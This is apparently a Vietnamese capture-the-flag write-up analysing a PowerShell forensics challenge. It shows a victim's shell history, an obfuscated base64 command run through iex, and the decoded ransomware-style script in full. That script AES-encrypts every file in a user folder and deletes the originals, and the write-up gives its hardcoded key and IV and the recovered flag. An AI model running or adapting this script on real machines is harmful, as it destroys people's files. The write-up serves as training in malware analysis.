PSModulePath                   C:\Users\bob\Documents\PowerShell\Modules;C:\Program Files\PowerShell\Modules;c:\prog...
PUBLIC                         C:\Users\Public                                                                         
SESSIONNAME                    Console                                                                                 
SystemDrive                    C:                                                                                      
SystemRoot                     C:\Windows                                                                              
TEMP                           C:\Users\bob\AppData\Local\Temp                                                         
TMP                            C:\Users\bob\AppData\Local\Temp                                                         
USERDOMAIN                     BOB-PC                                                                                  
USERDOMAIN_ROAMINGPROFILE      BOB-PC                                                                                  
USERNAME                       bob                                                                                     
USERPROFILE                    C:\Users\bob                                                                            
windir                         C:\Windows                                                                              
WSLENV                         WT_SESSION:WT_PROFILE_ID:                                                               
WT_PROFILE_ID                  {574e775e-4f2a-5b96-ac1e-a2962a402336}                                                  
WT_SESSION                     83c660f8-e0fe-42b5-a2d9-23519f2fa432                                                    



gci C:\Users\bob


    Directory: C:\Users\bob


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-r---         4/29/2024   2:59 PM                Contacts                                                             
d-r---         4/30/2024  12:26 PM                Desktop                                                              
d-r---         4/30/2024  12:26 PM                Documents                                                            
d-r---         4/29/2024   3:47 PM                Downloads                                                            
d-r---         4/29/2024   8:54 PM                Favorites                                                            
d-r---         4/29/2024   8:54 PM                Links                                                                
d-r---         4/29/2024   2:59 PM                Music                                                                
d-r---         3/17/2024   1:21 PM                OneDrive                                                             
d-r---         4/29/2024   2:59 PM                Pictures                                                             
d-r---         4/29/2024   2:59 PM                Saved Games                                                          
d-r---         4/29/2024   8:54 PM                Searches                                                             
d-r---         4/29/2024   2:59 PM                Videos                                                               



gci C:\Users\bob\Documents


    Directory: C:\Users\bob\Documents


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         4/29/2024   3:30 PM          20078 freeflag.docm                                                        



gci C:\Users\bob\Desktop


    Directory: C:\Users\bob\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         4/29/2024   3:09 PM          20810 cat.jpg                                                              
-a----         4/30/2024  12:27 PM            169 todo_important.txt                                                   



iex ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JGZvbGRlcj0nQzpcVXNlcnNcYm9iJzsgQWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uU2VjdXJpdHk7ICRwcm92aWRlciA9IE5ldy1PYmplY3QgU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNDcnlwdG9TZXJ2aWNlUHJvdmlkZXI7ICRwcm92aWRlci5LZXkgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCJfdzR5X2IzdHQzcl90aDRuIik7ICRwcm92aWRlci5JViA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0Qnl0ZXMoIjAzOTh5OXhsY3pzbXJmeTgiKTsgR2V0LUNoaWxkSXRlbSAkZm9sZGVyIC1GaWxlIC1SZWN1cnNlIHwgRm9yRWFjaC1PYmplY3QgeyAkaW5wdXQgPSBOZXctT2JqZWN0IElPLkZpbGVTdHJlYW0oJF8uRnVsbE5hbWUsIFtJTy5GaWxlTW9kZV06Ok9wZW4sIFtJTy5GaWxlQWNjZXNzXTo6UmVhZCk7ICRmaWxlbmFtZSA9ICIkKCRfLkZ1bGxOYW1lKS5lbmMiOyAkb3V0cHV0ID0gW1N5c3RlbS5JTy5GaWxlXTo6Q3JlYXRlKCRmaWxlbmFtZSk7ICRjcyA9IE5ldy1PYmplY3QgU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DcnlwdG9TdHJlYW0oJG91dHB1dCwgJHByb3ZpZGVyLkNyZWF0ZUVuY3J5cHRvcigpLCBbU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DcnlwdG9TdHJlYW1Nb2RlXTo6V3JpdGUpOyAkaW5wdXQuQ29weVRvKCRjcyk7ICRjcy5DbG9zZSgpOyAkb3V0cHV0LkNsb3NlKCk7ICRpbnB1dC5DbG9zZSgpOyBSZW1vdmUtSXRlbSAkX307ICRwcm92aWRlci5EaXNwb3NlKCk7')))

gci C:\Users\bob\Desktop


    Directory: C:\Users\bob\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         4/30/2024  12:33 PM          20816 cat.jpg.enc                                                          
-a----         4/30/2024  12:33 PM            176 todo_important.txt.enc                                               



[Convert]::ToBase64String([IO.File]::ReadAllBytes((gci "${Env:USERPROFILE}\Desktop\todo_important.txt.enc")))
1rlR6HY6oRjdSfnHgqBXsPmynKA+STdghcT3tvM1JqOACFb7C9tdd1lTrfr2xxmKe72f/I4TCUx9y2RftjCnCZcN6TwfGJaRwKxbvfp7x1zn7Im4mczMfT7n05gvfrPgZzLKyBQlMFou1FsDL2Xgc8etlub0DWu70Nztl4cncB3edgz/CHqv+YwjbElE3Z0yz7Ne0uf5Vb1SFkQZmVo9tVIzOPvS6MO+EIRMxKiPIHs=
  • image
  • Tại đây ta tìm thấy 1 phần của flag
  • Cuộn xuống 1 xíu ta sẽ thấy lệnh thực thi 1 mã base64, decode nó ta được 1 script mã hoá aes.
  • image
1

$folder='C:\Users\bob'; Add-Type -AssemblyName System.Security; $provider = New-Object System.Security.Cryptography.AesCryptoServiceProvider; $provider.Key = [System.Text.Encoding]::UTF8.GetBytes("_w4y_b3tt3r_th4n"); $provider.IV = [System.Text.Encoding]::UTF8.GetBytes("0398y9xlczsmrfy8"); Get-ChildItem $folder -File -Recurse | ForEach-Object { $input = New-Object IO.FileStream($_.FullName, [IO.FileMode]::Open, [IO.FileAccess]::Read); $filename = "$($_.FullName).enc"; $output = [System.IO.File]::Create($filename); $cs = New-Object System.Security.Cryptography.CryptoStream($output, $provider.CreateEncryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write); $input.CopyTo($cs); $cs.Close(); $output.Close(); $input.Close(); Remove-Item $_}; $provider.Dispose();
  • Tại đây nó sử dụng key và iv lần lượt là “_w4y_b3tt3r_th4n” và “0398y9xlczsmrfy8” để mã hoá file thành đuổi enc
  • Kéo xuống dưới thêm tí nữa ta thu được 1 đoạn base64 đã bị mã hoá với đuôi là enc
  • image
  • Dùng cyberchef để giải mã ta được phần 2 của flag
  • image

    Flag : BtSCTF{Sti11McAf33:D_72844187}

CTF
CTF malware shellcode macro
This post is licensed under CC BY 4.0 by the author.